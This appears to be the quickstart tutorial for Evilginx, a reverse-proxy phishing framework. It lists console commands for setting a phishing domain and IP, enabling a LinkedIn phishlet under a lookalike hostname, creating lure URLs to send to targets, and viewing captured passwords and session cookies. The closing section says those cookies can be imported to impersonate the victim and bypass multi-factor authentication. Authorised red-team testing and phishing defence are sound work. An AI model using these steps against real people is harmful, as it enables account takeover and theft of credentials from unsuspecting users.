Learn how to configure Evilginx and set up your first phishing campaign.
Start Evilginx and Evilpuppet following the deployment guide for your type of installation.
Set up a domain
When you start Evilginx for the first time you will see warning messages about server
domain and server
ipv4 being not set. This is the first thing you need to set up. As an example we'll use the domain and IP address from above.
: config domain not-a-phish.com
: config ipv4 220.127.116.11
If you're setting up a local development setup, you can pick whatever
domain you want and make sure to set the
ipv4 to a local IPv4 network address e.g.
Set up a phishlet
Now you can start enabling phishlets. You can list all of your available phishlets by typing
phishlets. Whenever you need help and find out the list of available commands, type
help. When you need more information about specific command type
help <command> e.g.
Don't forget to use the
Tab button as Evilginx command prompt fully supports auto-complete features and will make using it more convenient.
For this example we'll set up a Linkedin phishlet to demonstrate how to set up your first engagement.
Set up a hostname for your Linkedin phishing URL. You can pick whatever hostname you want with as many subdomains as you want, under condition that it ends with the top level domain you set up with
Here's an example:
: phishlets hostname linkedin totally.legit.linkedin.not-a-phish.com
Last step you need to do is enable the phishlet.
: phishlets enable linkedin
Now if you're not running a local development instance (started with
-developer command line argument), Evilginx will start to automatically obtain the required TLS certificates from LetsEncrypt.
If your firewall rules for inbound TCP
443 and UDP
53 ports are set up correctly, Evilginx should be able to successfully obtain the security certificates and your phishlet should now be ready to use.
If you're running Evilginx in developer mode, in your local deployment, you will have to manually modify your
C:\Windows\System32\drivers\etc\hosts file to be able to map the phishing hostnames to your local IP address.
To make it easier, Evilginx provides a way to generate a list of hosts automatically, which you can copy-paste into your
: phishlets get-hosts linkedin
Set up a lure
With the phishlet up and running, you can now create a lure, which will become a phishing link you send out to users in order to lure them to your phishing page.
Create a lure for the
: lures create linkedin
Your first lure will now be created with a random URL path. You can list all created lures with
You can list all created lures with:
Grab the URL link of your first lure (we assume the ID of the lure is
: lures get-url 0
You can now copy the URL and paste it into your web browser. If you're testing locally make sure to delete all cookies in your web browser every time before opening your phishing links.
Capture a session
Enter the credentials, for your own account, and go through the multi-factor authentication process, as a test run.
When Evilginx successfully captures the credentials, together with the authentication cookies for the session, you will see the followin message in the terminal window:
all authorization tokens intercepted!
List all captured sessions with:
And pick the session of interest by specifying its ID (we assume the ID of the session is
: sessions 0
You will see all the details of the captured session with
password, IP address and user-agent.
At the bottom you will see the session cookie, which can be used to import it into your own browser to impersonate the captured session. You can find out more about it in a guide dedidcated to sessions.
This concludes the tutorial. If you want to learn more, follow the guides on more specific features.